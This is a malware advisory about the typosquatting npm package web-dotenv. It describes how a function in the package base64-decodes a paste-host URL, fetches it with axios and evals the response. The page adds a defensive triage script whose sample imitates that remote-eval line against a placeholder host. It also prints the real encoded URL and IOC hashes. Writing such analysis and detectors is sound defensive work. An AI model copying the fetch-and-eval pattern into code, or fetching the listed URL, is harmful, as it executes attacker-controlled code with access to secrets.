Malicious package

web-dotenv (npm)

Malicious code in web-dotenv (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4728
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall web-dotenv

What this malware does

web-dotenv impersonates the widely used dotenv package: its package.json copies dotenv's repository (git://github.com/motdotla/dotenv.git) and homepage (github.com/motdotla/dotenv#readme), and the source is otherwise a verbatim copy of dotenv with one injected function. The package's primary documented entry point, config(), calls configfix() in lib/main.js, which base64-decodes the string CWh0dHBzOi8vd3d3Lmpzb25rZWVwZXIuY29tL2IvVktVTkk= to https://www.jsonkeeper.com/b/VKUNI, fetches that URL via axios, and passes the response body directly to eval. jsonkeeper.com is an anonymous, mutable paste host: the attacker can swap the executed JavaScript at any time without republishing the package. Any project that installs web-dotenv expecting dotenv-compatible behavior and calls .config() (the normal first line of any dotenv consumer) will execute attacker-controlled code in the Node process, with full access to environment variables, the filesystem, and outbound network. Three independent attack signals stack: typosquat of a top-tier package, a base64-obfuscated URL, and remote eval of mutable third-party content.
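The three signals above can be checked mechanically during dependency review. The following is an added example, not O3 Security's tooling or dotenv's code: it decodes base64-looking string literals and flags those that yield a URL, looks for eval combined with a network client, and compares the package name against the repository name in package.json. The sample package, its paste URL and the scoring thresholds are constructed placeholders.

```javascript
// String literals that look like base64 (16+ chars, optional padding).
const B64_LITERAL = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;

// Decode every base64-looking literal and keep the ones that yield an http(s) URL.
function decodedUrls(source) {
  const hits = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    // Buffer.from(..., 'base64') never throws; it skips invalid characters.
    // Decoded payloads may carry leading/trailing whitespace, so trim first.
    const text = Buffer.from(m[1], 'base64').toString('utf8').trim();
    if (/^https?:\/\/[\x21-\x7e]+$/.test(text)) hits.push({ literal: m[1], url: text });
  }
  return hits;
}

// Does package.json point at a repository whose name differs from the package?
// Monorepos make this common in legitimate packages, so it is a signal, not proof.
function repoNameMismatch(name, pkgJson) {
  const repo = pkgJson.repository;
  const url = typeof repo === 'string' ? repo : (repo && repo.url) || '';
  const tail = url.split('/').pop().replace(/\.git$/, '');
  return tail !== '' && tail !== name;
}

// Combine the three signals into a triage verdict (thresholds are an assumption).
function triage({ name, pkgJson, source }) {
  const signals = {
    encodedUrls: decodedUrls(source),
    remoteEval: /\beval\s*\(/.test(source) && /\b(axios|fetch|https?)\s*[.(]/.test(source),
    repoMismatch: repoNameMismatch(name, pkgJson),
  };
  const score = (signals.encodedUrls.length > 0) + signals.remoteEval + signals.repoMismatch;
  const verdict = score >= 2 ? 'quarantine' : score === 1 ? 'review' : 'clean';
  return { ...signals, score, verdict };
}

// Constructed sample mimicking the injected function; URL and repo are placeholders.
const SAMPLE_URL = 'https://paste.example/b/PLACEHOLDER';
const SAMPLE_B64 = Buffer.from('\t' + SAMPLE_URL).toString('base64');
const SUSPICIOUS = {
  name: 'web-dotenv',
  pkgJson: { repository: { type: 'git', url: 'git://github.com/example-org/dotenv.git' } },
  source: `const axios = require('axios');
function configfix() { axios.get(Buffer.from("${SAMPLE_B64}", "base64").toString()).then(r => eval(r.data)); }`,
};
const BENIGN = {
  name: 'dotenv',
  pkgJson: { repository: { type: 'git', url: 'git://github.com/example-org/dotenv.git' } },
  source: `const fs = require('fs');\nfunction config() { return fs.readFileSync('.env', 'utf8'); }`,
};
console.log(JSON.stringify(triage(SUSPICIOUS), null, 2));
```

Run it against an unpacked tarball (npm pack, then scan lib/*.js and package.json) before the package ever enters node_modules; a quarantine verdict means hold the dependency for manual review, not that the heuristic is conclusive.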

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

1 flagged
1.0.2

Indicators of compromise (SHA-256)

edd19476eeb1c31707abe6fac6f52dbd1950a0dc25f4854ea5269d6400f8ea37
91770cff2a99007b7479336034dc9ad4f71575a2876a4ace5ffe3a05362f94a4

Frequently asked questions

No. web-dotenv on npm has been identified as a malicious package (version 1.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004695
GHSA-7x3f-hjp7-r53g

Credits

  • Amazon Inspector · finder

web-dotenv (npm) malicious package — MAL-2026-4728 | O3 Security